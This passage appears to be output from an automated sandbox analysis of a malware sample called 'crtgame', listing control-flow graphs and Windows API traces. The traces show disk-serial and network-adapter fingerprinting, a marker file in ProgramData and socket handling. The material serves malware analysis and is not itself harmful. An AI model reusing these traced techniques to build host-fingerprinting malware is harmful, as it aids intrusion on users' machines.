                                                                                    control_flow_graph 1174 2c4f3a0-2c4f3c3 LoadLibraryA 1175 2c4f483-2c4f48a 1174->1175 1176 2c4f3c9-2c4f3d7 GetProcAddress 1174->1176 1177 2c4f47c-2c4f47d FreeLibrary 1176->1177 1178 2c4f3dd-2c4f3ed 1176->1178 1177->1175 1179 2c4f3ef-2c4f3fb GetAdaptersInfo 1178->1179 1180 2c4f433-2c4f43b 1179->1180 1181 2c4f3fd 1179->1181 1182 2c4f444-2c4f449 1180->1182 1183 2c4f43d-2c4f443 call 2c531a8 1180->1183 1184 2c4f3ff-2c4f406 1181->1184 1188 2c4f477-2c4f47b 1182->1188 1189 2c4f44b-2c4f44e 1182->1189 1183->1182 1185 2c4f410-2c4f418 1184->1185 1186 2c4f408-2c4f40c 1184->1186 1191 2c4f41b-2c4f420 1185->1191 1186->1184 1190 2c4f40e 1186->1190 1188->1177 1189->1188 1193 2c4f450-2c4f455 1189->1193 1190->1180 1191->1191 1194 2c4f422-2c4f42f call 2c4f082 1191->1194 1195 2c4f457-2c4f45f 1193->1195 1196 2c4f462-2c4f46d call 2c5354c 1193->1196 1194->1180 1195->1196 1196->1188 1201 2c4f46f-2c4f472 1196->1201 1201->1179
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C4F3B6
                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C4F3CF
                                                                                    • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C4F3F4
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 02C4F47D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                    • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                    • API String ID: 514930453-3114217049
                                                                                    • Opcode ID: 3a70d2104b52ca7243d47f63eb0bcc8f0c0167c2d7d963def21d44f2211e5ed3
                                                                                    • Instruction ID: 74e4365797deee9144f251408a6a0195b3e447b18347cc9d866183524af33dcd
                                                                                    • Opcode Fuzzy Hash: 3a70d2104b52ca7243d47f63eb0bcc8f0c0167c2d7d963def21d44f2211e5ed3
                                                                                    • Instruction Fuzzy Hash: 2A21C371E042099BDB10CAA9D8846EFBBF8EF44308F4441ADE945E7601DF348A45CAA0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1202 2c42b95-2c42baf 1203 2c42bc7-2c42bcb 1202->1203 1204 2c42bb1-2c42bb9 call 2c50510 1202->1204 1206 2c42bcd-2c42bd0 1203->1206 1207 2c42bdf 1203->1207 1211 2c42bbf-2c42bc2 1204->1211 1206->1207 1209 2c42bd2-2c42bdd call 2c50510 1206->1209 1210 2c42be2-2c42c11 WSASetLastError WSARecv call 2c49e92 1207->1210 1209->1211 1216 2c42c16-2c42c1d 1210->1216 1214 2c42d30 1211->1214 1217 2c42d32-2c42d38 1214->1217 1218 2c42c2c-2c42c32 1216->1218 1219 2c42c1f-2c42c2a call 2c50510 1216->1219 1220 2c42c34-2c42c39 call 2c50510 1218->1220 1221 2c42c46-2c42c48 1218->1221 1230 2c42c3f-2c42c42 1219->1230 1220->1230 1224 2c42c4f-2c42c60 call 2c50510 1221->1224 1225 2c42c4a-2c42c4d 1221->1225 1224->1217 1228 2c42c66-2c42c69 1224->1228 1225->1228 1232 2c42c73-2c42c76 1228->1232 1233 2c42c6b-2c42c6d 1228->1233 1230->1221 1232->1214 1235 2c42c7c-2c42c9a call 2c50510 call 2c4166f 1232->1235 1233->1232 1234 2c42d22-2c42d2d call 2c41996 1233->1234 1234->1214 1242 2c42cbc-2c42cfa WSASetLastError select call 2c49e92 1235->1242 1243 2c42c9c-2c42cba call 2c50510 call 2c4166f 1235->1243 1249 2c42cfc-2c42d06 call 2c50510 1242->1249 1250 2c42d08 1242->1250 1243->1214 1243->1242 1255 2c42d19-2c42d1d 1249->1255 1253 2c42d15-2c42d17 1250->1253 1254 2c42d0a-2c42d12 call 2c50510 1250->1254 1253->1214 1253->1255 1254->1253 1255->1210
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C42BE4
                                                                                    • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C42C07
                                                                                      • Part of subcall function 02C49E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C43114), ref: 02C49EA0
                                                                                    • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C42CD3
                                                                                    • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C42CE7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Recvselect
                                                                                    • String ID: 3'
                                                                                    • API String ID: 886190287-280543908
                                                                                    • Opcode ID: 2b29920453257d087a504b1c5edbe903a1aa3c04ec4d03b79309de9743153e84
                                                                                    • Instruction ID: 436e1b2d7f470d68e2b0aca823427504b32424fc66ee58a34a7f8eaa5c33e85f
                                                                                    • Opcode Fuzzy Hash: 2b29920453257d087a504b1c5edbe903a1aa3c04ec4d03b79309de9743153e84
                                                                                    • Instruction Fuzzy Hash: 724146B19043059FD7109F65C90576BBBE9AF88364F104D1EF899C7280EBB0D680CBA6

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1259 2c4f29c-2c4f2c7 CreateFileA 1260 2c4f2cd-2c4f2e2 1259->1260 1261 2c4f398-2c4f39f 1259->1261 1262 2c4f2e5-2c4f307 DeviceIoControl 1260->1262 1263 2c4f340-2c4f348 1262->1263 1264 2c4f309-2c4f311 1262->1264 1265 2c4f351-2c4f353 1263->1265 1266 2c4f34a-2c4f350 call 2c531a8 1263->1266 1267 2c4f313-2c4f318 1264->1267 1268 2c4f31a-2c4f31f 1264->1268 1270 2c4f355-2c4f358 1265->1270 1271 2c4f38e-2c4f397 CloseHandle 1265->1271 1266->1265 1267->1263 1268->1263 1272 2c4f321-2c4f329 1268->1272 1274 2c4f374-2c4f381 call 2c5354c 1270->1274 1275 2c4f35a-2c4f363 GetLastError 1270->1275 1271->1261 1276 2c4f32c-2c4f331 1272->1276 1274->1271 1283 2c4f383-2c4f389 1274->1283 1275->1271 1277 2c4f365-2c4f368 1275->1277 1276->1276 1279 2c4f333-2c4f33f call 2c4f082 1276->1279 1277->1274 1280 2c4f36a-2c4f371 1277->1280 1279->1263 1280->1274 1283->1262
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C4F2BB
                                                                                    • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C4F2F9
                                                                                    • GetLastError.KERNEL32 ref: 02C4F35A
                                                                                    • CloseHandle.KERNELBASE(?), ref: 02C4F391
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                    • String ID: \\.\PhysicalDrive0
                                                                                    • API String ID: 4026078076-1180397377
                                                                                    • Opcode ID: 545ebbd53fedba73ffcb27dc45815ba43b7da59f9014455ab6200338ebf6ec28
                                                                                    • Instruction ID: 68fdb6583d0c245446587079a1899daa6c6a2c0374c1ed045ba235f76db45796
                                                                                    • Opcode Fuzzy Hash: 545ebbd53fedba73ffcb27dc45815ba43b7da59f9014455ab6200338ebf6ec28
                                                                                    • Instruction Fuzzy Hash: 8A31A371E00219EBDB24DF95D884BAFBBB8EF84758F10416EE509A7680DB745B44CBD0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C45C48
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • _memset.LIBCMT ref: 02C45C5B
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C45C68
                                                                                    • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C45C70
                                                                                    • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C45C7C
                                                                                    • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C45C95
                                                                                    • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C45CAA
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C45CB1
                                                                                    • __time64.LIBCMT ref: 02C45CC5
                                                                                    • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C45CE2
                                                                                    • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C45CF7
                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C45CFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
                                                                                    • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                                    • API String ID: 204396691-2903805982
                                                                                    • Opcode ID: 938f4b56e104db54fdb487d9675722e8d6cb23547cb7533200438429f6d8d871
                                                                                    • Instruction ID: 07407df15ec50ebd0c0b6b04c0382874bbe7700f8ba17d191609c4e1882b20c1
                                                                                    • Opcode Fuzzy Hash: 938f4b56e104db54fdb487d9675722e8d6cb23547cb7533200438429f6d8d871
                                                                                    • Instruction Fuzzy Hash: 4C21C472940218BFE7106BA5AC8DFBFFBACDB45668F004A55F909A31C0DB705D198BB1

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1050 2c41cf8-2c41d21 CreateEventA 1051 2c41d52-2c41d69 CreateEventA 1050->1051 1052 2c41d23-2c41d4e GetLastError call 2c50510 call 2c41712 1050->1052 1053 2c41d9a-2c41dc4 call 2c52db9 1051->1053 1054 2c41d6b-2c41d96 GetLastError call 2c50510 call 2c41712 1051->1054 1052->1051 1061 2c41dc6-2c41dda GetLastError 1053->1061 1062 2c41e0d-2c41e0f 1053->1062 1054->1053 1072 2c41ddc-2c41ddd CloseHandle 1061->1072 1073 2c41ddf-2c41de7 1061->1073 1065 2c41e11-2c41e1b WaitForSingleObject CloseHandle 1062->1065 1066 2c41e1d-2c41e23 1062->1066 1065->1066 1072->1073 1074 2c41dee-2c41e08 call 2c50510 call 2c41712 1073->1074 1075 2c41de9-2c41dec CloseHandle 1073->1075 1074->1062 1075->1074
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C41D11
                                                                                    • GetLastError.KERNEL32 ref: 02C41D23
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C41D59
                                                                                    • GetLastError.KERNEL32 ref: 02C41D6B
                                                                                    • __beginthreadex.LIBCMT ref: 02C41DB1
                                                                                    • GetLastError.KERNEL32 ref: 02C41DC6
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C41DDD
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C41DEC
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C41E14
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 02C41E1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                    • String ID: thread$thread.entry_event$thread.exit_event
                                                                                    • API String ID: 831262434-3017686385
                                                                                    • Opcode ID: b613c34c5256c1ca15dc4e21782134d102cbccfe89024965dbaf39faae41054f
                                                                                    • Instruction ID: 266ce0da4bebe1446d45e3cc3a1889f904100a01dde365b01cd4ed5c646d4c7d
                                                                                    • Opcode Fuzzy Hash: b613c34c5256c1ca15dc4e21782134d102cbccfe89024965dbaf39faae41054f
                                                                                    • Instruction Fuzzy Hash: F2318F759003119FD700EF24C888B2BBBA5EB84754F14492DF99987390DBB1D989CFE2

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1079 2c44cb1-2c44cf6 call 2c64df0 call 2c50510 RtlEnterCriticalSection RtlLeaveCriticalSection 1084 2c44cfc 1079->1084 1085 2c44fff-2c45008 1079->1085 1088 2c44d01-2c44d21 call 2c43863 call 2c44b18 1084->1088 1086 2c4500f-2c4501f 1085->1086 1087 2c4500a call 2c4380b 1085->1087 1087->1086 1093 2c44d26-2c44d2b 1088->1093 1094 2c44d31-2c44d36 1093->1094 1095 2c44fcc-2c44fd8 RtlEnterCriticalSection RtlLeaveCriticalSection 1093->1095 1096 2c44d3c-2c44d65 call 2c4c862 1094->1096 1097 2c44f99-2c44f9b 1094->1097 1098 2c44fde-2c44ff9 RtlEnterCriticalSection RtlLeaveCriticalSection 1095->1098 1096->1095 1103 2c44d6b-2c44d87 call 2c476ad 1096->1103 1097->1095 1100 2c44f9d-2c44fca call 2c4a0ae 1097->1100 1098->1085 1098->1088 1100->1095 1100->1098 1107 2c44def-2c44df3 1103->1107 1108 2c44d89-2c44db2 call 2c4c862 1103->1108 1109 2c44df5-2c44e24 call 2c4c862 1107->1109 1110 2c44db8-2c44dc4 RtlEnterCriticalSection RtlLeaveCriticalSection 1107->1110 1108->1110 1115 2c44ec3-2c44eec call 2c4c862 1108->1115 1109->1110 1120 2c44e26-2c44e57 call 2c4c862 1109->1120 1113 2c44dca-2c44dd1 RtlEnterCriticalSection RtlLeaveCriticalSection 1110->1113 1116 2c44dd7-2c44dea call 2c48315 1113->1116 1124 2c44ef2-2c44f1b call 2c4c862 1115->1124 1125 2c44f8f-2c44f94 1115->1125 1116->1098 1120->1110 1128 2c44e5d-2c44ebe call 2c4c994 call 2c48315 call 2c4808a call 2c48315 1120->1128 1124->1125 1131 2c44f1d-2c44f7b call 2c47687 call 2c4a33b call 2c4a413 call 2c48315 call 2c512f0 1124->1131 1125->1113 1128->1115 1131->1116 1148 2c44f81-2c44f8a call 2c44100 1131->1148 1148->1116
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44CB6
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44CE2
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44CEE
                                                                                      • Part of subcall function 02C44B18: __EH_prolog.LIBCMT ref: 02C44B1D
                                                                                      • Part of subcall function 02C44B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C44C1D
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44DBE
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44DC4
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44DCB
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44DD1
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44FD2
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44FD8
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C44FE3
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C44FEC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 2062355503-0
                                                                                    • Opcode ID: b3d7e7491d1dff1a26f05a6e102b5e7df1a3a102011af4848cd2db1c668855e5
                                                                                    • Instruction ID: f58b3e5641e2d0288e9f39526a695f99acb32b2d7605c2de55bb0ea31e1df42d
                                                                                    • Opcode Fuzzy Hash: b3d7e7491d1dff1a26f05a6e102b5e7df1a3a102011af4848cd2db1c668855e5
                                                                                    • Instruction Fuzzy Hash: 88B14C71D0025DDFEF25DF90C844BEEBBB5AF04314F24419AE809B6280DBB55A49DFA1

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1151 2c426db-2c42726 RtlEnterCriticalSection 1152 2c4277e-2c42781 1151->1152 1153 2c42728-2c42736 CreateWaitableTimerA 1151->1153 1156 2c427d5-2c427f0 RtlLeaveCriticalSection 1152->1156 1157 2c42783-2c42798 call 2c5354c 1152->1157 1154 2c42738-2c42756 GetLastError call 2c50510 call 2c41712 1153->1154 1155 2c4275b-2c42778 SetWaitableTimer 1153->1155 1154->1155 1155->1152 1163 2c427ca 1157->1163 1164 2c4279a-2c427ac call 2c5354c 1157->1164 1165 2c427cc-2c427d0 call 2c4778c 1163->1165 1169 2c427ae-2c427b7 1164->1169 1170 2c427b9 1164->1170 1165->1156 1171 2c427bb-2c427c3 call 2c41cf8 1169->1171 1170->1171 1173 2c427c8 1171->1173 1173->1165
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C42706
                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C4272B
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C65553), ref: 02C42738
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C42778
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C427D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                    • String ID: timer
                                                                                    • API String ID: 4293676635-1792073242
                                                                                    • Opcode ID: f77548b8ad52f42a6465b174986c5f32a564309cce202d63ff6f1700cf6dcaeb
                                                                                    • Instruction ID: d4cfbaf42f52f61784658899665badfd065fceeee2544b0d274aa96542d5de23
                                                                                    • Opcode Fuzzy Hash: f77548b8ad52f42a6465b174986c5f32a564309cce202d63ff6f1700cf6dcaeb
                                                                                    • Instruction Fuzzy Hash: 43316FB1904745AFD310DF66C989B27BBE8FB48764F004A2EF85583A80DB70D954CFA6

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1285 2c4f1e7-2c4f23d call 2c4f29c call 2c4f3a0 GetWindowsDirectoryA 1290 2c4f23f-2c4f261 CreateFileA 1285->1290 1291 2c4f28b-2c4f29b call 2c4f14f 1285->1291 1290->1291 1292 2c4f263-2c4f27b GetFileTime CloseHandle 1290->1292 1292->1291 1294 2c4f27d-2c4f28a call 2c4f082 1292->1294 1294->1291
                                                                                    APIs
                                                                                      • Part of subcall function 02C4F29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C4F2BB
                                                                                      • Part of subcall function 02C4F29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C4F2F9
                                                                                      • Part of subcall function 02C4F29C: GetLastError.KERNEL32 ref: 02C4F35A
                                                                                      • Part of subcall function 02C4F29C: CloseHandle.KERNELBASE(?), ref: 02C4F391
                                                                                      • Part of subcall function 02C4F3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C4F3B6
                                                                                      • Part of subcall function 02C4F3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C4F3CF
                                                                                      • Part of subcall function 02C4F3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C4F3F4
                                                                                      • Part of subcall function 02C4F3A0: FreeLibrary.KERNEL32(00000000), ref: 02C4F47D
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C4F235
                                                                                    • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C4F256
                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C4F26A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C4F273
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                                    • String ID: tLVh
                                                                                    • API String ID: 1378705229-319918027
                                                                                    • Opcode ID: f196e466e64d7f38633873aaa77a191210b217b4123c9619761df14199c1efe5
                                                                                    • Instruction ID: e98db77a091017c3263665025e1b40b7138622c19b4b90f97f82b9b9420e33aa
                                                                                    • Opcode Fuzzy Hash: f196e466e64d7f38633873aaa77a191210b217b4123c9619761df14199c1efe5
                                                                                    • Instruction Fuzzy Hash: 38113075D4032C6BDB209BA5DC88FDEBB7DEB49714F000619E909AB184DB745A49CBD0

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1298 2c429ee-2c42a06 1299 2c42ab3-2c42abb call 2c50510 1298->1299 1300 2c42a0c-2c42a10 1298->1300 1308 2c42abe-2c42ac6 1299->1308 1301 2c42a12-2c42a15 1300->1301 1302 2c42a39-2c42a4c WSASetLastError closesocket call 2c49e92 1300->1302 1301->1302 1304 2c42a17-2c42a36 call 2c50510 call 2c42f50 1301->1304 1307 2c42a51-2c42a55 1302->1307 1304->1302 1307->1299 1310 2c42a57-2c42a5f call 2c50510 1307->1310 1316 2c42a61-2c42a67 1310->1316 1317 2c42a69-2c42a71 call 2c50510 1310->1317 1316->1317 1318 2c42a7b-2c42aad ioctlsocket WSASetLastError closesocket call 2c49e92 1316->1318 1322 2c42a73-2c42a79 1317->1322 1323 2c42aaf-2c42ab1 1317->1323 1318->1323 1322->1318 1322->1323 1323->1299 1323->1308
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C42A3B
                                                                                    • closesocket.WS2_32(?), ref: 02C42A42
                                                                                    • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C42A89
                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02C42A97
                                                                                    • closesocket.WS2_32(?), ref: 02C42A9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1561005644-0
                                                                                    • Opcode ID: 15d3e5ca9f58315fae3f4330db3951a9537dea10659e0e778797044b9cc1d186
                                                                                    • Instruction ID: 0c968b63da65258499bbc115203dc6f5d6af13e5b829517c7095f253f1621f97
                                                                                    • Opcode Fuzzy Hash: 15d3e5ca9f58315fae3f4330db3951a9537dea10659e0e778797044b9cc1d186
                                                                                    • Instruction Fuzzy Hash: 3E21FB71940215ABEB24ABB8884976BB7E9DF84325F104E6AFD45C3241FF70CA84C761

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1325 2c41ba7-2c41bcf call 2c64df0 RtlEnterCriticalSection 1328 2c41bd1 1325->1328 1329 2c41be9-2c41bf7 RtlLeaveCriticalSection call 2c4dcbc 1325->1329 1330 2c41bd4-2c41be0 call 2c41b79 1328->1330 1332 2c41bfa-2c41c20 RtlEnterCriticalSection 1329->1332 1337 2c41c55-2c41c6e RtlLeaveCriticalSection 1330->1337 1338 2c41be2-2c41be7 1330->1338 1334 2c41c34-2c41c36 1332->1334 1335 2c41c22-2c41c2f call 2c41b79 1334->1335 1336 2c41c38-2c41c43 1334->1336 1339 2c41c45-2c41c4b 1335->1339 1343 2c41c31 1335->1343 1336->1339 1338->1329 1338->1330 1339->1337 1342 2c41c4d-2c41c51 1339->1342 1342->1337 1343->1334
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C41BAC
                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02C41BBC
                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02C41BEA
                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02C41C13
                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02C41C56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 1633115879-0
                                                                                    • Opcode ID: 20dbb76fae7386a4b6f214993e8a0b073b25a14fd30f9f8b9356f8621d71efc5
                                                                                    • Instruction ID: c86dd23bb723f8c5387486692f08569bc6cdd55f24bd3b91f7858a26b0d98506
                                                                                    • Opcode Fuzzy Hash: 20dbb76fae7386a4b6f214993e8a0b073b25a14fd30f9f8b9356f8621d71efc5
                                                                                    • Instruction Fuzzy Hash: 88219FB5900614EFCB14CF69C8887ABBBB5FF88714F148589E85997301DBB4EA45CBE0

Control-flow Graph (interactive graph; legend: Executed / Not Executed)
control_flow_graph 1345 2c45d49-2c45d4d 1346 2c45d4f-2c45d58 1345->1346 1347 2c45cea-2c45d1c WriteFile CloseHandle call 2c455a8 1345->1347 1348 2c45d1f 1346->1348 1349 2c45d5a-2c45d61 1346->1349 1353 2c45d20-2c45d25 1348->1353 1351 2c45d62-2c45d65 1349->1351 1351->1353 1354 2c45d68-2c45d92 1351->1354 1356 2c45d2a-2c45d3b call 2c529ac 1353->1356 1354->1356 1357 2c45d94 1354->1357 1356->1345 1357->1351 1361 2c45d97-2c45d9d 1357->1361
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C45CF7
                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C45CFE
                                                                                    • _malloc.LIBCMT ref: 02C45D2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleWrite_malloc
                                                                                    • String ID: idle
                                                                                    • API String ID: 1977945335-3693393173
                                                                                    • Opcode ID: b3cf98ea40a57d70bec128a821702a1d3bcdecb8df337e346e42a8b45dc56911
                                                                                    • Instruction ID: 735e0369d2f186af4f5406a8b553016f921da6bb175f41947f8397699d5a0a6d
                                                                                    • Opcode Fuzzy Hash: b3cf98ea40a57d70bec128a821702a1d3bcdecb8df337e346e42a8b45dc56911
                                                                                    • Instruction Fuzzy Hash: FB11597AA50204AFC7059A65D8899FFBBB8EF8E264B500699F504DB201DB309D06C7B2

Control-flow Graph (interactive graph; legend: Executed / Not Executed)
